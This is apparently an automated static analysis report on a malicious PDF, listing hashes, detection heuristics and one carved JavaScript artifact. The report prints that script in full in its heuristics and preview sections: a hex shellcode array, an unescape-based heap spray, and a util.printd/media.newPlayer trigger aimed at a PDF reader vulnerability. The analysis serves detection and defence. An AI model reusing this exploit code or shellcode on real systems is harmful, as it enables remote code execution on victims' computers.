Malicious PDF — malware analysis report

Static analysis result for SHA-256 da10528dc484642a…

MALICIOUS

PDF

1.4 KB First seen: 2026-05-10
MD5: 2dd5e960c275f6b8bf6f24e19861cc61 SHA-1: b1aaf7c1a288eb43aea0d2530d804909ef8a3efc SHA-256: da10528dc484642a8f600d2035c65edba9fd7d8f9fe548eef366b15b13031f14
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests the JavaScript is obfuscated, a common technique for evading detection. The extracted artifact 'javascript_obj0005_000.js' is also flagged as suspicious because of script obfuscation indicators. The preview of that artifact shows the script assembling a %u-encoded string with unescape(), replicating it into a large array (a pattern consistent with heap spraying), and then calling util.printd and this.media.newPlayer, which points to an attempt to trigger a PDF reader vulnerability. The likely intent is therefore to execute malicious code, either by exploiting a PDF reader vulnerability directly or by downloading a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript on its own remains low-severity, but this correlated cluster is a high-confidence indicator of malicious behavior.
    Matched line in script
    var Wo1 = ["EB","54","8B","75","3C","8B","74","35","78","03","F5","56","8B","76","20","03","F5","33","C9","49","41","AD","33","DB","36","0F","BE","14","28","38","F2","74","08","C1","CB","0D","03","DA","40","EB","EF","3B","DF","75","E7","5E","8B","5E","24","03","DD","66","8B","0C","4B","8B","5E","1C","03","DD","8B","04","8B","03","C5","C3","75","72","6C","6D","6F","6E","2E","64","6C","6C","00","43","3A","5C","55","2E","65","78","65","00","33","C0","64","03","40","30","78","0C","8B","40","0C","8B" …
    var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i+1]+Wo1[i]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0005_000.js | pdf-javascript-stream | PDF /JS object 5 at offset 0x156 | 2078 bytes
SHA-256: c9883edfd9b410f3f593f9ff5aeb7f1830b465c50c45abe194c9ae2db49740fb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
The carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo1 = ["EB","54","8B","75","3C","8B","74","35","78","03","F5","56","8B","76","20","03","F5","33","C9","49","41","AD","33","DB","36","0F","BE","14","28","38","F2","74","08","C1","CB","0D","03","DA","40","EB","EF","3B","DF","75","E7","5E","8B","5E","24","03","DD","66","8B","0C","4B","8B","5E","1C","03","DD","8B","04","8B","03","C5","C3","75","72","6C","6D","6F","6E","2E","64","6C","6C","00","43","3A","5C","55","2E","65","78","65","00","33","C0","64","03","40","30","78","0C","8B","40","0C","8B","70","1C","AD","8B","40","08","EB","09","8B","40","34","8D","40","7C","8B","40","3C","95","BF","8E","4E","0E","EC","E8","84","FF","FF","FF","83","EC","04","83","2C","24","3C","FF","D0","55","50","BF","33","CA","8A","5B","E8","6F","FF","FF","FF","8B","DC","83","C3","10","53","BB","78","56","34","12","81","EB","54","46","34","12","53","FF","D0","BF","38","22","AC","E7","E8","51","FF","FF","FF","8B","DC","83","C3","10","53","6A","21","E8","00","00","00","00","59","83","C1","53","90","51","53","FF","D0","8B","2C","24","BF","36","1A","2F","70","E8","2E","FF","FF","FF","8B","D4","83","C2","10","33","DB","53","53","52","EB","2C","5B","83","C3","03","53","33","DB","53","FF","D0","5D","5D","BF","98","FE","8A","0E","E8","0C","FF","FF","FF","89","24","24","80","04","24","08","FF","D0","BF","7E","D8","E2","73","E8","F9","FE","FF","FF","52","FF","D0","E8","CF","FF","FF","FF","70","66","00","68","3A","5C","77","69","6E","64","6F","77","73","5C","73","79","73","74","65","6D","33","32","5C","63","61","6C","63","2E","65","78","65","00","00"];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i+1]+Wo1[i]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());